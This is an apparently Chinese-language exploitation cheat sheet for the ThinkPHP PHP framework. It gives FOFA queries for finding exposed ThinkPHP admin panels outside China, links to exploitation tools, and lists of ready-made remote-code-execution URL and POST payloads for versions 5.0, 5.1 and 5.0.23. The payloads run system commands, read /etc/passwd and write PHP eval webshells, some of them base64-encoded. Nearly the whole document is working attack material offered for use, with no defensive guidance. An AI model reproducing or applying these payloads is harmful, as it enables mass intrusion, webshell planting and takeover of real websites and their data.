Thinkphp
简介
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。
很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。
判断网站是否使用thinkphp
看报错是否是笑脸
批量检查漏洞
使用fofa
1
2
3
| header="thinkphp" && country!="CN"
header="thinkphp" && country!="CN" && title="后台管理"
header="thinkphp" && country!="CN" && title="后台管理" && after="2021-01-01"
|
利用工具
https://github.com/Lotus6/ThinkphpGUI
https://github.com/bewhale/thinkphp_gui_tools
https://github.com/MrHatSec/ThinkPhp5.x_Scan
Thinkphp3 漏洞总结
https://y4er.com/post/thinkphp3-vuln/
Thinkphp5 RCE 总结
https://y4er.com/post/thinkphp5-rce/
5.0.* 常用poc
执行命令
1
2
3
4
5
| /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/index.php?s=index/\think\Request/input&filter=system&data=id
/index.php?s=/index/\think\request/cache&key=1|phpinfo
|
写入Webshell
1
2
3
4
5
| /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo -n YWFhPD9waHAgQGV2YWwoJF9QT1NUW2NjY10pOz8+YmJi | base64 -d > shell9.php
注意:Base64编码后的字符串如果含有 + 号,在URL中需要进行URL编码,及 + 号变为 %2B
|
其他payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/index.php?s=index/\think\Request/input&filter=phpinfo&data=1
/index.php?s=index/\think\Request/input&filter=system&data=id
/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
/index.php?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
|
5.1.*漏洞利用poc
执行命令
1
2
3
4
5
6
7
| /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/index.php?s=index/\think\Request/input&filter=system&data=id
/index.php?s=/index/\think\request/cache&key=1|phpinfo
|
写入webshell
1
2
3
| /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" >shell.php
(echo "^<?php @eval(\$_POST[ccc]);?^>" >shell1.php)
|
其他payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/index.php?s=index/\think\Request/input&filter=phpinfo&data=1
/index.php?s=index/\think\Request/input&filter=system&data=id
/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
/index.php?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
|
5.0.23
1
2
3
4
5
6
7
8
| POST:/index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /etc/passwd
POST:/index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php eval(\$_POST['cmd']);?>" > 1.php
|